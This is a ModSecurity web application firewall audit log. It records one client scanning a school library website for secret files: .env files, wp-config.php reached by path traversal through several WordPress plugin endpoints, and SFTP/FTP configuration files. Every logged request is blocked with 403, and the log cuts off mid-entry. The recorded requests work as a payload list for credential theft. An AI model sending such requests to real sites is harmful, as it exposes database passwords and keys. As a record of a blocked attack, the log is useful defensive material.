User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362344
--9ab04d5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--9ab04d5a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578198330921 683 (- - -)
Stopwatch2: 1745578198330921 683; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9ab04d5a-Z--
--df85b562-A--
[25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBgAAAIs 103.236.140.4 42584 103.236.140.4 8181
--df85b562-B--
GET /ci4/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268879
--df85b562-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--df85b562-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578198528235 846 (- - -)
Stopwatch2: 1745578198528235 846; combined=333, p1=293, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--df85b562-Z--
--db916752-A--
[25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBwAAAII 103.236.140.4 42588 103.236.140.4 8181
--db916752-B--
GET /backup/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362347
--db916752-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--db916752-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578198725951 669 (- - -)
Stopwatch2: 1745578198725951 669; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--db916752-Z--
--b1330c72-A--
[25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iCAAAAIc 103.236.140.4 42592 103.236.140.4 8181
--b1330c72-B--
GET /frontend/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268882
--b1330c72-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--b1330c72-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578198922904 687 (- - -)
Stopwatch2: 1745578198922904 687; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b1330c72-Z--
--dbf1d15c-A--
[25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCQAAAIU 103.236.140.4 42596 103.236.140.4 8181
--dbf1d15c-B--
GET /old/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362350
--dbf1d15c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--dbf1d15c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578199120372 896 (- - -)
Stopwatch2: 1745578199120372 896; combined=342, p1=297, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dbf1d15c-Z--
--13748561-A--
[25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCgAAAIk 103.236.140.4 42600 103.236.140.4 8181
--13748561-B--
GET /dev/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268885
--13748561-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--13748561-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578199319234 775 (- - -)
Stopwatch2: 1745578199319234 775; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=111, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--13748561-Z--
--232d3b70-A--
[25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCwAAAJU 103.236.140.4 42608 103.236.140.4 8181
--232d3b70-B--
GET /.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268888
--232d3b70-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--232d3b70-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578199517057 693 (- - -)
Stopwatch2: 1745578199517057 693; combined=280, p1=245, p2=0, p3=0, p4=0, p5=34, sr=78, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--232d3b70-Z--
--3e605c37-A--
[25/Apr/2025:17:49:59 +0700] aAto1-OdEP6frSVs8Cp41gAAABM 103.236.140.4 42612 103.236.140.4 8181
--3e605c37-B--
GET /public/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362356
--3e605c37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--3e605c37-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578199715199 1141 (- - -)
Stopwatch2: 1745578199715199 1141; combined=391, p1=342, p2=0, p3=0, p4=0, p5=49, sr=99, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3e605c37-Z--
--9cef0c06-A--
[25/Apr/2025:17:50:05 +0700] aAto3eOdEP6frSVs8Cp42gAAAAI 103.236.140.4 42686 103.236.140.4 8181
--9cef0c06-B--
GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362407
--9cef0c06-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--9cef0c06-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578205547721 838 (- - -)
Stopwatch2: 1745578205547721 838; combined=379, p1=346, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9cef0c06-Z--
--48f01416-A--
[25/Apr/2025:17:50:05 +0700] aAto3fKu9d5eAb6Kn98pIgAAANQ 103.236.140.4 42696 103.236.140.4 8181
--48f01416-B--
GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268942
--48f01416-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--48f01416-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578205746005 806 (- - -)
Stopwatch2: 1745578205746005 806; combined=336, p1=301, p2=0, p3=0, p4=0, p5=34, sr=120, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--48f01416-Z--
--a6604636-A--
[25/Apr/2025:17:50:05 +0700] aAto3fKu9d5eAb6Kn98pIwAAANE 103.236.140.4 42700 103.236.140.4 8181
--a6604636-B--
GET /force-download.php?file=wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362410
--a6604636-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--a6604636-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578205945914 943 (- - -)
Stopwatch2: 1745578205945914 943; combined=374, p1=337, p2=0, p3=0, p4=0, p5=37, sr=137, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a6604636-Z--
--3eaab400-A--
[25/Apr/2025:17:50:06 +0700] aAto3j8HMZgF-3Y3GtGAdAAAAE8 103.236.140.4 42708 103.236.140.4 8181
--3eaab400-B--
GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362413
--3eaab400-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--3eaab400-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578206143650 705 (- - -)
Stopwatch2: 1745578206143650 705; combined=269, p1=241, p2=0, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3eaab400-Z--
--304c3637-A--
[25/Apr/2025:17:50:06 +0700] aAto3j8HMZgF-3Y3GtGAdQAAAEg 103.236.140.4 42712 103.236.140.4 8181
--304c3637-B--
GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268948
--304c3637-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--304c3637-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578206341155 677 (- - -)
Stopwatch2: 1745578206341155 677; combined=273, p1=247, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--304c3637-Z--
--46687c77-A--
[25/Apr/2025:17:50:08 +0700] aAto4OXF4ZX3hX-IbN7iHwAAAI0 103.236.140.4 42740 103.236.140.4 8181
--46687c77-B--
GET /.vscode/sftp-config.json HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268966
--46687c77-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--46687c77-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578208346373 714 (- - -)
Stopwatch2: 1745578208346373 714; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--46687c77-Z--
--5d0a481a-A--
[25/Apr/2025:17:50:08 +0700] aAto4OOdEP6frSVs8Cp44QAAAAc 103.236.140.4 42746 103.236.140.4 8181
--5d0a481a-B--
GET /resources/sftp-config.json HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362434
--5d0a481a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--5d0a481a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578208543925 902 (- - -)
Stopwatch2: 1745578208543925 902; combined=400, p1=367, p2=0, p3=0, p4=0, p5=32, sr=159, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5d0a481a-Z--
--f744851c-A--
[25/Apr/2025:17:50:08 +0700] aAto4OOdEP6frSVs8Cp44wAAAAA 103.236.140.4 42750 103.236.140.4 8181
--f744851c-B--
GET /ftp.config HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362437
--f744851c-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--f744851c-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578208943284 2058 (- - -)
Stopwatch2: 1745578208943284 2058; combined=764, p1=382, p2=354, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f744851c-Z--
--a836d658-A--
[25/Apr/2025:17:50:11 +0700] aAto4z8HMZgF-3Y3GtGAhAAAAEc 103.236.140.4 42774 103.236.140.4 8181
--a836d658-B--
GET /ftp.config HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
